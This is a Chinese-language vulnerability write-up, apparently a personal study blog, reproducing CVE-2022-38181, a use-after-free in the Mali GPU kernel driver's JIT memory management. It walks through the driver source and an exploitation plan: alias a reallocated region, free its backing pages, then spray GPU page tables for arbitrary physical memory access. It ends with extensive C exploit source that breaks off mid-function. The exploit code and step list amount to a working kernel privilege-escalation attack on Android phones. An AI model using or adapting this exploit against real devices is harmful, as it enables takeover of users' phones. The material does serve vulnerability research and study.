Mali GPU CVE-2022-38181 漏洞复现

Mali GPU CVE-2022-38181 漏洞复现

henry Lv4

CVE-2022-38181

Reference: https://github.blog/security/vulnerability-research/pwning-the-all-google-phone-with-a-non-google-bug/

英文阅读能力好的,直接看上方作者原文更容易理解。这篇博客内容仅供自己学习使用。

许多其他类型的GPU内存是直接通过像KBASE_IOCTL_MEM_IMPORT这样的ioctl调用创建的。然而,JIT内存区域的情况比较特殊,它们是通过使用KBASE_IOCTL_JOB_SUBMIT ioctl调用提交一条特殊的GPU指令来创建的。

KBASE_IOCTL_JOB_SUBMIT 这个 ioctl 命令可以用于向 GPU 提交一个“作业链”以供处理。虽然 KBASE_IOCTL_JOB_SUBMIT 通常用于向 GPU 本身发送指令,但也有一些作业是在内核中实现并在 CPU 上运行的。这些是软作业software jobs,其中包括指示内核分配和释放 JIT 内存的作业(BASE_JD_REQ_SOFT_JIT_ALLOCBASE_JD_REQ_SOFT_JIT_FREE)。

The life cycle of JIT memory

虽然KBASE_IOCTL_JOB_SUBMIT是一个通用的ioctl调用,包含负责处理不同类型GPU作业的代码路径,但BASE_JD_REQ_SOFT_JIT_ALLOC作业本质上会调用kbase_jit_allocate_process,后者再调用kbase_jit_allocate来创建一个 JIT 内存区域。

为了理解JIT内存的生命周期和使用情况,介绍几个不同的概念。

在使用Mali GPU驱动程序时,用户应用程序首先需要创建并初始化一个kbase_context内核对象。这包括用户应用程序打开驱动程序文件,并使用所得的文件描述符进行一系列ioctl调用。

kbase_context 对象负责管理为每个打开的驱动程序文件分配的资源,并且每个文件句柄都有一个唯一的kbase_context对象。特别是,它有三个list_head字段,用于管理 JIT内存 :jit_active_headjit_pool_headjit_destroy_head。顾名思义,jit_active_head包含用户应用程序正在使用的内存jit_pool_head包含未使用的内存区域,而jit_destroy_head包含等待被释放并返回给内核的内存区域

尽管jit_pool_headjit_destroy_head都用于管理空闲的JIT区域,但jit_pool_head充当内存池的角色,包含打算在分配新 JIT 区域时重用的 JIT 区域,而jit_destroy_head包含将要返回给内核的内存。

kbase_jit_allocate 被调用时,JIT 内存管理器首先会尝试从 jit_pool_head 中寻找适合的区域:

1
2
3
4
5
6
7
if (info->usage_id != 0)
/* First scan for an allocation with the same usage ID */
reg = find_reasonable_region(info, &kctx->jit_pool_head, false);
...
if (reg) {
...
list_move(&reg->jit_node, &kctx->jit_active_head);

如果找到合适的区域,那么它将被移动到jit_active_head,表示它现在在用户空间中使用。否则,将创建一个内存区域并将其添加到jit_active_head中。kbase_jit_allocate分配的区域(无论是从jit_pool_head新创建的,还是从jit_pool_head重新使用的)随后会调用 kbase_jit_allocate_process 存储在kbase_contextjit_alloc数组中。

kbase_jit_allocate

Snipaste_2024-12-05_16-41-41

kbase_jit_grow

Snipaste_2024-12-05_16-00-07

当用户不再需要 JIT region 时,可以向GPU发送一个BASE_JD_REQ_SOFT_JIT_FREE作业,然后,GPU使用kbase_jit_free来释放内存。但是,kbase_jit_free不会立即将内存区域的backing pages返回给内核,而是首先将backing region缩小到最小大小,并移除任何CPU端的映射,这样用户进程的地址空间就无法再访问该区域中的页了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
...
//First reduce the size of the backing region and unmap the freed pages
old_pages = kbase_reg_current_backed_size(reg);
if (reg->initial_commit < old_pages) {
u64 new_size = MAX(reg->initial_commit,
div_u64(old_pages * (100 - kctx->trim_level), 100));
u64 delta = old_pages - new_size;
//Free delta pages in the region and reduces its size to old_pages - delta
if (delta) {
mutex_lock(&kctx->reg_lock);
kbase_mem_shrink(kctx, reg, old_pages - delta);
mutex_unlock(&kctx->reg_lock);
}
}
...
//Remove the pages from address space of user process
kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents);

在上面这个阶段,reg 的 backing pages 并未被完全移除,并且 reg 也不会在此处被释放。相反,reg 被移回jit_pool_head中,同时 reg 也被移动到了kbase_contextevict_list中,见下面的代码

1
2
3
4
5
6
7
8
9
10
kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents);
...
mutex_lock(&kctx->jit_evict_lock);
/* This allocation can't already be on a list. */
WARN_ON(!list_empty(&reg->gpu_alloc->evict_node));
//Add reg to evict_list
list_add(&reg->gpu_alloc->evict_node, &kctx->evict_list);
atomic_add(reg->gpu_alloc->nents, &kctx->evict_nents);
//Move reg to jit_pool_head
list_move(&reg->jit_node, &kctx->jit_pool_head);

kbase_jit_free

Snipaste_2024-12-06_16-57-16

kbase_jit_free 完成之后,kbase_jit_free_finish将会清除掉保存在jit_alloc中的引用,即使reg在这个阶段仍然是有效的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
static void kbase_jit_free_finish(struct kbase_jd_atom *katom)
{
...
for (j = 0; j != katom->nr_extres; ++j) {
if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) {
...
if (kctx->jit_alloc[ids[j]] !=
KBASE_RESERVED_REG_JIT_ALLOC) {
...
kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]);
}
kctx->jit_alloc[ids[j]] = NULL; //<--------- clean up reference
}
}
...
}

当用户分配另一个 JIT region 时,jit_pool_head 列表中的空闲JIT region可能会被重用。所以,这就解释了 jit_pool_headjit_active_head

当通过调用 kbase_jit_free 释放 JIT 内存(即 JIT region)时,它也会被放入 evict_list中。evict_list 中的内存区域是在出现内存压力时可以释放的区域,通过将不再使用的 JIT 区域放入 evict_list,Mali 驱动程序可以保留未使用的 JIT 内存以便快速重新分配,同时在需要资源时将其返回给内核。

shrinker

Linux内核提供了一种机制来回收未使用的缓存内存,称为收缩器(shrinkers)。内核驱动可以定义一个收缩器对象,这其中包括定义count_objectsscan_objects等一些方法:

1
2
3
4
5
6
7
struct shrinker {
unsigned long (*count_objects)(struct shrinker *,
struct shrink_control *sc);
unsigned long (*scan_objects)(struct shrinker *,
struct shrink_control *sc);
...
};

自定义内存 shrinker 可以通过register_shrinker方法进行注册。当内核处于内存压力之下时,它会遍历已注册的压缩器列表,并使用它们的count_objects方法来确定可以释放的内存区域,然后使用scan_objects来释放内存。

在Mali GPU驱动程序的情况下,shrinker 是在 kbase_mem_evictable_init 方法中定义和注册的:

1
2
3
4
5
6
7
8
9
10
int kbase_mem_evictable_init(struct kbase_context *kctx)
{
...
//kctx->reclaim is a shrinker
kctx->reclaim.count_objects = kbase_mem_evictable_reclaim_count_objects;
kctx->reclaim.scan_objects = kbase_mem_evictable_reclaim_scan_objects;
...
register_shrinker(&kctx->reclaim);
return 0;
}

下面来了解一下 kbase_mem_evictable_reclaim_scan_objects 这个函数,负责释放内存返回给内核:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static
unsigned long kbase_mem_evictable_reclaim_scan_objects(struct shrinker *s,
struct shrink_control *sc)
{
...
list_for_each_entry_safe(alloc, tmp, &kctx->evict_list, evict_node) {
int err;

err = kbase_mem_shrink_gpu_mapping(kctx, alloc->reg,
0, alloc->nents);
...
kbase_free_phy_pages_helper(alloc, alloc->evicted);
...
list_del_init(&alloc->evict_node);
...
kbase_jit_backing_lost(alloc->reg); //<------- moves `reg` to `jit_destroy_pool`
}
...
}

kbase_mem_evictable_reclaim_scan_objects会遍历evict_list,从GPU中取消映射backing pages(注意:kbase_jit_free 中已经移除了CPU映射),然后释放 backing pages。之后,它会调用kbase_jit_backing_lost来将regjit_pool_head移动到jit_destroy_head

1
2
3
4
5
6
7
void kbase_jit_backing_lost(struct kbase_va_region *reg)
{
...
list_move(&reg->jit_node, &kctx->jit_destroy_head);

schedule_work(&kctx->jit_work);
}

jit_destroy_head 中的内存区域随后被 kbase_jit_destroy_worker 接收,该工作线程随后释放 jit_destroy_head中的 kbase_va_region,并完全移除对该 kbase_va_region 的引用。

通常,JIT region 只有在用户通过 BASE_JD_REQ_SOFT_JIT_FREE 作业释放它时才会被移动到 evict_list,该作业会移除存储在 jit_alloc 中的引用。

The vulnerability

比起 JIT memory evictable memory 更为通用,其他类型的GPU内存也可以添加到 evict_list中,从而使其变为可驱逐的。这可以通过调用kbase_mem_evictable_make函数将内存区域添加到 evict_list中,以及调用kbase_mem_evictable_unmake函数从 evict_list中移除内存区域来实现。

在用户空间中,这些操作可以通过KBASE_IOCTL_MEM_FLAGS_CHANGE ioctl来调用,根据是否存在KBASE_REG_DONT_NEED标志,可以将内存区域添加到evict_list中或从evict_list中移除:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
int kbase_mem_flags_change(struct kbase_context *kctx, u64 gpu_addr, unsigned int flags, unsigned int mask)
{
...
prev_needed = (KBASE_REG_DONT_NEED & reg->flags) == KBASE_REG_DONT_NEED;
new_needed = (BASE_MEM_DONT_NEED & flags) == BASE_MEM_DONT_NEED;
if (prev_needed != new_needed) {
...
if (new_needed) {
...
ret = kbase_mem_evictable_make(reg->gpu_alloc); //<------ Add to `evict_list`
if (ret)
goto out_unlock;
} else {
kbase_mem_evictable_unmake(reg->gpu_alloc); //<------- Remove from `evict_list`
}
}

通过将 JIT 内存区域直接放入evict_list中,然后施加内存压力以触发kbase_mem_evictable_reclaim_scan_objects,尽管指向 JIT 区域的指针仍存储在jit_alloc中,但该 JIT region 被释放。

之后,可以提交一个BASE_JD_REQ_SOFT_JIT_FREE任务,以触发kbase_jit_free_finish来使jit_alloc中指向的对象被释放:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
static void kbase_jit_free_finish(struct kbase_jd_atom *katom)
{
...
for (j = 0; j != katom->nr_extres; ++j) {
if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) {
...
if (kctx->jit_alloc[ids[j]] !=
KBASE_RESERVED_REG_JIT_ALLOC) {
...
kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]); //<----- Use of the now freed jit_alloc[ids[j]]
}
kctx->jit_alloc[ids[j]] = NULL;
}
}

除此之外,kbase_jit_free 首先会释放当前已释放的 kctx->jit_alloc[ids[j]] 中的一些backing pages

1
2
3
4
5
6
7
8
9
10
11
12
13
void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
...
old_pages = kbase_reg_current_backed_size(reg);
if (reg->initial_commit < old_pages) {
...
u64 delta = old_pages - new_size;
if (delta) {
mutex_lock(&kctx->reg_lock);
kbase_mem_shrink(kctx, reg, old_pages - delta); //<----- Free some pages in the region
mutex_unlock(&kctx->reg_lock);
}
}

通过将释放的 JIT region 替换为一个fake object,可以实现任意地址释放。

Exploiting

知识点:

KBASE_IOCTL_MEM_QUERY ioctl 允许用户检查包含有 GPU address 的内存区域中的地址是否有效,如果 JIT 内存已被释放,则该调用将会返回 error,所以可以使用该调用来检查 JIT 内存是否被释放(GHSL-2023-005中有提到这种方法)。

JIT regionkbase_va_region会从kmalloc-256中分配堆块。

Replacing the freed object

1
2
3
4
5
6
7
8
9
10
11
12
13
void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
...
old_pages = kbase_reg_current_backed_size(reg);
if (reg->initial_commit < old_pages) {
...
u64 delta = old_pages - new_size;
if (delta) {
mutex_lock(&kctx->reg_lock);
kbase_mem_shrink(kctx, reg, old_pages - delta); //<----- Free some pages in the region
mutex_unlock(&kctx->reg_lock);
}
}

在上面的代码中,kbase_mem_shrink 将会释放 JIT region,可以考虑通过使用 sendmsg 堆喷来获取该堆块,然后覆写一个假的kbase_va_region,这样的话通过指定其对应的gpu_alloc中的pages字段,我们就可以实现任意页面释放。

1
2
3
4
5
6
7
8
9
10
11
12
13
int kbase_mem_shrink(struct kbase_context *const kctx,
struct kbase_va_region *const reg, u64 new_pages)
{
...
err = kbase_mem_shrink_gpu_mapping(kctx, reg,
new_pages, old_pages);
if (err >= 0) {
/* Update all CPU mapping(s) */
kbase_mem_shrink_cpu_mapping(kctx, reg,
new_pages, old_pages);
kbase_free_phy_pages_helper(reg->cpu_alloc, delta); //<------- free pages in cpu_alloc
if (reg->cpu_alloc != reg->gpu_alloc)
kbase_free_phy_pages_helper(reg->gpu_alloc, delta); //<--- free pages in gpu_alloc

但事实是通过sendmsg来覆写堆块需要考虑很多因素,因为JIT region 有很多状态,同时很多操作只能在一个具体的状态下执行,同时我们可能还需要泄漏地址,从而来确定我们想要控制的内存区域,这两点无疑增大了利用的难度。

总的来说,上述方法其实并不好用,因为与其堆喷其他堆块,我们不如来使用 mali 驱动中自身的堆块,比如说 mem_alloc 申请来的堆块,记住kctx->jit_alloc[ids[j]]此时就会指向该堆块,原因是在shrinker触发之后回收内存时,并没有清理该指针信息,会导致悬空指针的出现。

这里可以用到 CVE-2022-20186 中提到的一个技巧 Memory alias ,这样的话在释放的时候只有 reg 中的内存映射被移除,但是alias region中的仍然存在,并且可以用来访问已经被释放的backing pages

注意事项:kbase_mem_shrink 只有在kbase_va_region没有被映射多次时(像 Memory alias 就会多添加一次映射)才允许调用

同时,kbase_mem_alias 通过检查KBASE_REG_NOUSRE_FREE 来禁止对 JIT region 完成映射:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
u64 kbase_mem_alias(struct kbase_context *kctx, u64 *flags, u64 stride,
u64 nents, struct base_mem_aliasing_info *ai,
u64 *num_pages)
{
...
for (i = 0; i < nents; i++) {
if (ai[i].handle.basep.handle < BASE_MEM_FIRST_FREE_ADDRESS) {
if (ai[i].handle.basep.handle !=
BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE)
...
} else {
...
if (aliasing_reg->flags & KBASE_REG_NO_USER_FREE) //<-- 2.
goto bad_handle; /* JIT regions can't be
* aliased. NO_USER_FREE flag
* covers the entire lifetime
* of JIT regions. The other
* types of regions covered
* by this flag also shall
* not be aliased.
...
}

现在,利用前面的 vuln 下,通过 KBASE_IOCTL_MEM_ALLOC ioctl(相同类型的对象,但不存在 KBASE_REG_NO_USER_FREE 标志)分配的一个正常内存区域替换了已释放的 JIT 区域,然后,使用 KBASE_IOCTL_MEM_ALIAS 为这个新区域的backing store创建一个额外的映射。

这些操作都是有效的,因为新申请的region没有设置 KBASE_REG_NO_USER_FREE 标志,所以可以添加别名。然而,由于这个错误,jit_alloc 中的一个悬空指针也指向了这个新的、现在已被设置了别名的区域。

如果现在提交一个BASE_JD_REQ_SOFT_JIT_FREE任务来对这个内存调用kbase_jit_free,那么将会调用kbase_mem_shrink,这个新区域中的一部分backing store会被释放,但是别名区域中创建的额外映射将不会被移除,这意味着仍然可以从别名区域访问被释放的后备页。

通过使用一个真实的同类型对象,不仅省去了构造fake object的麻烦,还降低了因可能引发崩溃的副作用而带来的风险。

后续的利用依然是通过申请 PGD,来劫持页表,实现任意物理内存读写。

Snipaste_2024-12-11_15-16-41

页表占用之后的效果

Snipaste_2024-12-11_20-49-11

利用步骤

  • jit_allocate 申请一块 jit_region
  • mem_change_flag 设置 jit_region 为 BASE_MEM_DONT_NEED
  • flush 触发内存压力,即执行 shrinker,将 jit_region 释放回 mem_pool
  • mem_alloc 堆喷,将 uaf jit region 从mem_pool申请回来
  • 对 mem_alloc 申请出来的内存,申请别名 alias region 区域
  • drain_mem_pool 耗干 mem_pool
  • release_mem_pool 将 mem_pool 填充满
  • jit_free 释放先前依然由悬挂指针的 jit_region
  • reserved 堆喷 pgd
  • 后面就是正常的写操作

最终效果

Snipaste_2024-12-11_20-40-53

summarize

关于 mali gpu 这一块,一定要多读源码,尤其是 jit 内存管理那里,主要针对kbase_jit_allocatekbase_jit_free这两个函数,然后把里面的每一个调用,细节都过一遍,这样在写才会知其所以然,对漏洞的把控和观察也会更加细致。

final exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include "stdbool.h"
#include <sys/system_properties.h>
#include <sys/syscall.h>

#include "mali.h"
#include "mali_base_jm_kernel.h"
#include "midgard.h"

#ifdef SHELL
#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
#else
#include <android/log.h>
#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
#endif

#define MALI_PATH "/dev/mali0"
#define TOTAL_RESERVED_SIZE 1024
#define RESERVED_SIZE 32
#define FLUSH_SIZE 0x1000*0x1000
#define SPRAY_PAGES 25
#define SPRAY_NUM 64
#define POOL_SIZE 16384
#define FLUSH_REGION_SIZE 500

int mali_fd, mali_fd2;
static uint8_t atom_number = 1;
static uint8_t jit_id = 1;
static uint64_t reserved[TOTAL_RESERVED_SIZE/ RESERVED_SIZE];
static uint64_t gpu_va[SPRAY_NUM] = {0};
static void* alias_regions[SPRAY_NUM] = {0};
static void* flush_regions[FLUSH_REGION_SIZE];

struct base_mem_handle {
struct {
__u64 handle;
} basep;
};

struct base_mem_aliasing_info {
struct base_mem_handle handle;
__u64 offset;
__u64 length;
};

int open_dev(char* name){
int fd = open(name, O_RDWR);
if (fd < 0) err(1, "cannot open %s\n", name);
return fd;
}

void print_binary(void *addr, int len) {
size_t *buf64 = (size_t *) addr;
char *buf8 = (char *) addr;
for (int i = 0; i < len / 8; i += 2) {
printf(" %04x", i * 8);
for (int j = 0; j < 2; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 16 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}

void print_addr(char* name, uint64_t addr) {
printf("[+] %s == 0x%lx\n", name, addr);
}

#define CPU_SETSIZE 1024
#define __NCPUBITS (8 * sizeof (unsigned long))
typedef struct
{
unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
} cpu_set_t;

#define CPU_SET(cpu, cpusetp) \
((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
#define CPU_ZERO(cpusetp) \
memset((cpusetp), 0, sizeof(cpu_set_t))

int migrate_to_cpu(int i)
{
int syscallres;
pid_t pid = gettid();
cpu_set_t cpu;
CPU_ZERO(&cpu);
CPU_SET(i, &cpu);

syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu);
if (syscallres)
{
return -1;
}
return 0;
}

void setup_mali(int fd, int group_id) {
struct kbase_ioctl_version_check param = {0};
if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, &param) < 0) {
err(1, "version check failed\n");
}
struct kbase_ioctl_set_flags set_flags = {group_id << 3};
if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
err(1, "set flags failed\n");
}
}

void* setup_tracking_page(int fd) {
void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE);
if (region == MAP_FAILED) {
err(1, "setup tracking page failed");
}
return region;
}

void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0){
err(1, "mem_alloc failed\n");
}
}

void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) {
if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) {
err(1, "mem_alias failed\n");
}
}

void mem_query(int fd, union kbase_ioctl_mem_query* query) {
if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) {
err(1, "mem_query failed\n");
}
}

void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) {
struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, pages = pages};
if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) {
err(1, "mem_commit failed\n");
}
}

void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results){
struct kbase_ioctl_mem_flags_change change = {0};
change.flags = flags;
change.gpu_va = gpu_addr;
change.mask = flags;
if (ignore_results) {
ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change);
return;
}
if (ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change) < 0){
err(1, "flags change failed\n");
}
}

uint64_t drain_mem_pool(int mali_fd) {
union kbase_ioctl_mem_alloc alloc = {0};
alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
int prot = PROT_READ | PROT_WRITE;
alloc.in.va_pages = POOL_SIZE;
alloc.in.commit_pages = POOL_SIZE;
mem_alloc(mali_fd, &alloc);
return alloc.out.gpu_va;
}

void release_mem_pool(int mali_fd, uint64_t drain) {
struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain};
if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
err(1, "free_mem failed\n");
}
}

void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) {
union kbase_ioctl_mem_alloc alloc = {0};
alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
int prot = PROT_READ;
if (!read_only) {
alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
prot |= PROT_WRITE;
}
alloc.in.va_pages = va_pages;
alloc.in.commit_pages = commit_pages;
mem_alloc(mali_fd, &alloc);
void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
if (region == MAP_FAILED) {
err(1, "mmap failed");
}
return region;
}

void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) {
struct kbase_ioctl_mem_jit_init init = {0};
init.va_pages = va_pages;
init.max_allocations = 255;
init.trim_level = trim_level;
init.group_id = group_id;
init.phys_pages = va_pages;

if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) {
err(1, "jit init failed\n");
}
}

uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr) {
struct base_jit_alloc_info info = {0};
struct base_jd_atom_v2 atom = {0};

info.id = id;
info.gpu_alloc_addr = gpu_alloc_addr;
info.va_pages = va_pages;
info.commit_pages = va_pages;
info.extension = 0x1000;

atom.jc = (uint64_t)(&info);
atom.atom_number = atom_number;
atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC;
atom.nr_extres = 1;
struct kbase_ioctl_job_submit submit = {0};
submit.addr = (uint64_t)(&atom);
submit.nr_atoms = 1;
submit.stride = sizeof(struct base_jd_atom_v2);
if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
err(1, "submit job failed\n");
}
return *((uint64_t*)gpu_alloc_addr);
}


void jit_free(int fd, uint8_t atom_number, uint8_t id) {
uint8_t free_id = id;

struct base_jd_atom_v2 atom = {0};

atom.jc = (uint64_t)(&free_id);
atom.atom_number = atom_number;
atom.core_req = BASE_JD_REQ_SOFT_JIT_FREE;
atom.nr_extres = 1;
struct kbase_ioctl_job_submit submit = {0};
submit.addr = (uint64_t)(&atom);
submit.nr_atoms = 1;
submit.stride = sizeof(struct base_jd_atom_v2);
if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
err(1, "submit job failed\n");
}
}

void* flush(int spray_cpu, int idx){
migrate_to_cpu(spray_cpu);
void* region = mmap(NULL, FLUSH_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (region == MAP_FAILED) err(1, "flush failed");
//trigger page fault to allocate physical page
memset(region, idx, FLUSH_SIZE);
return region;
}

void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va, int group_id) {
for (int i = 0; i < nents; i++) {
union kbase_ioctl_mem_alloc alloc = {0};
alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (group_id << 22);
int prot = PROT_READ | PROT_WRITE;
alloc.in.va_pages = pages;
alloc.in.commit_pages = pages;
mem_alloc(mali_fd, &alloc);
reserved_va[i] = alloc.out.gpu_va;
}
}

void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
for (int i = 0; i < nents; i++) {
void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
if (reserved == MAP_FAILED) {
err(1, "mmap reserved failed");
}
reserved_va[i] = (uint64_t)reserved;
}
}

int find_freed_idx(int mali_fd) {
int freed_idx = -1;
for (int j = 0; j < SPRAY_NUM; j++) {
union kbase_ioctl_mem_query query = {0};
query.in.gpu_addr = gpu_va[j];
query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query);
if (query.out.value != SPRAY_PAGES) {
LOG("jit_free commit: %d %llu\n", j, query.out.value);
freed_idx = j;
}
}
return freed_idx;
}

int find_pgd(int freed_idx, int start_pg) {
uint64_t* this_alias = alias_regions[freed_idx];
for (int pg = start_pg; pg < SPRAY_PAGES; pg++) {
printf("============== this_alias[%d * 0x1000/8] ==============\n", pg);
print_binary((void *)&this_alias[pg * 0x1000/8], 0x1000);
for (int i = 0; i < 0x1000/8; i++) {
uint64_t entry = this_alias[pg * 0x1000/8 + i];
if ((entry & 0x443) == 0x443) {
return pg;
}
}
}
return -1;
}

//触发缺页处理程序
void fault_pages() {
int read = 0;
for (int va = 0; va < SPRAY_NUM; va++) {
uint8_t* this_va = (uint8_t*)(gpu_va[va]);
*this_va = 0;
uint8_t* this_alias = alias_regions[va];
read += *this_alias;
}
LOG("read %d\n", read);
}

void spray_mem(int fd, int group_id){
uint64_t cookies[32] = {0};
for (int j = 0; j < 32; j++) {
union kbase_ioctl_mem_alloc alloc = {0};
alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group_id << 22);
alloc.in.va_pages = SPRAY_PAGES;
alloc.in.commit_pages = 0;
mem_alloc(fd, &alloc);
cookies[j] = alloc.out.gpu_va;
}
for (int j = 0; j < 32; j++) {
void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, fd, cookies[j]);
if (region == MAP_FAILED) {
err(1, "mmap failed");
}
gpu_va[j] = (uint64_t)region;
}
for (int j = 32; j < 64; j++) {
union kbase_ioctl_mem_alloc alloc = {0};
alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group_id << 22);
